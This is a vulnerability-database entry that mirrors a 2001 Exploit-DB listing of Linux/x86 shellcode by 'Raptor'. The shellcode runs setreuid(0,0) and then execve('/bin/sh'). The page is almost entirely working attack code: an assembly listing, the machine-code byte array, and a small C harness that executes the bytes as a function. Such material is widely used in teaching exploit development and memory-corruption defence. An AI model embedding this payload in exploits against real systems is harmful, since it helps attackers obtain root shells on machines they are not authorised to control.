Linux/x86 – setreuid(0,0) + execve(/bin/sh) Shellcode (46+ bytes)

Vulnerability ID: 1053531
Vulnerability type:
Published: 2001-05-07
Updated: 2001-05-07
CVE ID: N/A
CNNVD-ID: N/A
Platform: Linux_x86
CVSS score: N/A
|Vulnerability source
https://www.exploit-db.com/exploits/13458
|Vulnerability details
Vulnerability details have not been disclosed.
|Exploit
/*
 * $Id: execve-setreuid.c,v 1.1 2001/05/02 18:10:52 raptor Exp $
 *
 * execve-setreuid.c v1.0 - shellcode for Linux/i386
 * Copyright (c) 2001 Raptor <[email protected]>
 *
 * This shellcode does an execve of /bin/sh
 * after a setreuid(0, 0), then exit()s.
 *
 */
/* * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * ASM Code                                              *
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 * ; setreuid(0, 0)
 * xorl %eax,%eax
 * xorl %ebx,%ebx
 * xorl %ecx,%ecx
 * movb $70,%al
 * int $0x80
 *
 * ; execve(foo[0], foo, 0);
 * jmp 0x1d
 * popl %esi
 * movb %eax,0x7(%esi)
 * movl %eax,0xc(%esi)
 * movl %esi,0x8(%esi)
 * movl %esi,%ebx
 * leal 0x8(%esi),%ecx
 * leal 0xc(%esi),%edx
 * movb $11,%al
 * int $0x80
 *
 * ; exit(0)
 * xorl %eax,%eax
 * xorl %ebx,%ebx
 * incl %eax
 * int $0x80
 *
 * call -0x22
 * .ascii "/bin/sh"
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * */

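/* Machine code for the assembly listed above; "/bin/sh" is appended as data. */
char code[] =
  "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
  "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
  "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
  "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";

int main(void)
{
  int (*funct)();
  funct = (int (*)()) code;   /* treat the byte array as a function */
  (int)(*funct)();
  return 0;
}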


// milw0rm.com [2001-05-07]
